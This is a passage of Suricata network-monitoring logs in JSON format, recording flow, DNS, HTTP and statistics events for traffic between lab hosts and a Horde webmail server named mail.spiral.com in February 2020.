"est_pruned":2278,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22157,"memcap_state":0,"memcap_global":0},"http":{"memuse":45015,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:18.002196+0000","flow_id":1558539106348560,"event_type":"flow","src_ip":"192.168.10.122","src_port":56244,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:17.421392+0000","end":"2020-02-29T00:01:17.526761+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:19.000515+0000","flow_id":342874398464368,"event_type":"flow","src_ip":"192.168.10.130","src_port":34740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4180,"start":"2020-02-29T00:05:13.268656+0000","end":"2020-02-29T00:05:18.458861+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:21.000394+0000","flow_id":752305025627883,"event_type":"flow","src_ip":"192.168.10.122","src_port":44785,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:20.243435+0000","end":"2020-02-29T00:01:20.354683+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:21.002044+0000","flow_id":1043121556102940,"event_type":"flow","src_ip":"192.168.10.122","src_port":37302,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:19.991004+0000","end":"2020-02-29T00:01:20.096028+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:06:24.000289+0000","flow_id":992711525217637,"event_type":"flow","src_ip":"192.168.10.122","src_port":57146,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:23.144741+0000","end":"2020-02-29T00:01:23.249667+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:24.001303+0000","flow_id":644114799654146,"event_type":"flow","src_ip":"192.168.10.122","src_port":41023,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:23.849154+0000","end":"2020-02-29T00:01:23.954296+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:24.001991+0000","flow_id":509385984074491,"event_type":"flow","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1495,"bytes_toclient":6239,"start":"2020-02-29T00:04:50.025339+0000","end":"2020-02-29T00:05:23.459884+0000","age":33,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:06:25.000302+0000","event_type":"stats","stats":{"uptime":14037,"capture":{"kernel_packets":133563,"kernel_drops":0},"decoder":{"pkts":133563,"bytes":92428978,"invalid":181,"ipv4":132114,"ipv6":8,"ethernet":133563,"raw":0,"null":0,"sll":0,"tcp":127013,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2690,"new_pruned":15,"est_pruned":2282,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20504,"memcap_state":0,"memcap_global":0},"http":{"memuse":44855,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:25.001840+0000","flow_id":1948590856745586,"event_type":"flow","src_ip":"192.168.10.122","src_port":59007,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:24.471666+0000","end":"2020-02-29T00:01:24.576661+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:30.002978+0000","flow_id":83501324109156,"event_type":"flow","src_ip":"192.168.10.130","src_port":34742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1167,"bytes_toclient":7936,"start":"2020-02-29T00:05:23.460132+0000","end":"2020-02-29T00:05:29.625666+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:30.700781+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7519,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:30.811812+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43136,"proto":"UDP","dns":{"type":"answer","id":7519,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:30.811812+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43136,"proto":"UDP","dns":{"type":"answer","id":7519,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:06:30.847321+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:06:30.847321+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:06:31.000843+0000","flow_id":943744603502432,"event_type":"flow","src_ip":"192.168.10.122","src_port":58746,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:29.964448+0000","end":"2020-02-29T00:01:30.077302+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:06:31.436369+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35205,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18967,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:32.000213+0000","event_type":"stats","stats":{"uptime":14044,"capture":{"kernel_packets":133571,"kernel_drops":0},"decoder":{"pkts":133580,"bytes":92431195,"invalid":181,"ipv4":132127,"ipv6":8,"ethernet":133580,"raw":0,"null":0,"sll":0,"tcp":127024,"udp":4908,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2706,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2722,"synack":2713,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1749,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2238,"failed_udp":110},"tx":{"http":4535,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2315}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2285,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20431,"memcap_state":0,"memcap_global":0},"http"
:{"memuse":40143,"memcap":0}}} {"timestamp":"2020-02-29T00:06:35.851694+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34748,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:06:36.553564+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35205,"proto":"UDP","dns":{"type":"answer","id":18967,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:36.553564+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35205,"proto":"UDP","dns":{"type":"answer","id":18967,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:36.623375+0000","flow_id":926165322136906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7770}} 
{"timestamp":"2020-02-29T00:06:39.000306+0000","event_type":"stats","stats":{"uptime":14051,"capture":{"kernel_packets":133592,"kernel_drops":0},"decoder":{"pkts":133605,"bytes":92441637,"invalid":181,"ipv4":132150,"ipv6":8,"ethernet":133605,"raw":0,"null":0,"sll":0,"tcp":127044,"udp":4910,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2707,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2723,"synack":2714,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1750,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2239,"failed_udp":110},"tx":{"http":4536,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2316}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2286,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":108161,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:41.624581+0000","flow_id":926165322136906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7770},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":42655,"tx_id":0}} {"timestamp":"2020-02-29T00:06:41.867378+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46214,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62371,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:41.975863+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46214,"proto":"UDP","dns":{"type":"answer","id":62371,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:41.975863+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46214,"proto":"UDP","dns":{"type":"answer","id":62371,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:42.066598+0000","flow_id":1874300828193260,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5273}} {"timestamp":"2020-02-29T00:06:42.582426+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43798,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48233,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:42.690395+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43798,"proto":"UDP","dns":{"type":"answer","id":48233,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:42.690395+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43798,"proto":"UDP","dns":{"type":"answer","id":48233,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:42.845851+0000","flow_id":2186244303009272,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6892}} 
{"timestamp":"2020-02-29T00:06:46.000415+0000","event_type":"stats","stats":{"uptime":14058,"capture":{"kernel_packets":133618,"kernel_drops":0},"decoder":{"pkts":133643,"bytes":92458310,"invalid":181,"ipv4":132188,"ipv6":8,"ethernet":133643,"raw":0,"null":0,"sll":0,"tcp":127078,"udp":4914,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2709,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2725,"synack":2716,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1752,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2241,"failed_udp":110},"tx":{"http":4538,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2318}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2286,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21164,"memcap_state":0,"memcap_global":0},"http":{"memuse":137984,"memcap":0}}} 
{"timestamp":"2020-02-29T00:06:47.067491+0000","flow_id":1874300828193260,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52694,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5273},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":25872,"tx_id":0}} {"timestamp":"2020-02-29T00:06:47.850714+0000","flow_id":2186244303009272,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6892},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35875,"tx_id":0}} {"timestamp":"2020-02-29T00:06:48.000500+0000","flow_id":1275784246733683,"event_type":"flow","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":1664,"bytes_toclient":7838,"start":"2020-02-29T00:05:42.404339+0000","end":"2020-02-29T00:05:47.657846+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:06:48.001717+0000","flow_id":448856997904054,"event_type":"flow","src_ip":"192.168.10.122","src_port":56014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:46.933558+0000","end":"2020-02-29T00:01:47.039247+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:48.002381+0000","flow_id":1377287193441638,"event_type":"flow","src_ip":"192.168.10.122","src_port":52259,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:47.144742+0000","end":"2020-02-29T00:01:47.250009+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:48.579771+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58818,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48270,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:48.688271+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":48270,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:48.688271+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":48270,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:06:48.768128+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3981}} {"timestamp":"2020-02-29T00:06:53.000179+0000","event_type":"stats","stats":{"uptime":14065,"capture":{"kernel_packets":133655,"kernel_drops":0},"decoder":{"pkts":133665,"bytes":92464732,"invalid":181,"ipv4":132208,"ipv6":8,"ethernet":133665,"raw":0,"null":0,"sll":0,"tcp":127096,"udp":4916,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2710,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2726,"synack":2717,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1753,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2242,"failed_udp":110},"tx":{"http":4539,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2319}},"flow_mgr":{"closed_pruned":2693,"ne
w_pruned":15,"est_pruned":2288,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20833,"memcap_state":0,"memcap_global":0},"http":{"memuse":52445,"memcap":0}}} {"timestamp":"2020-02-29T00:06:53.521339+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 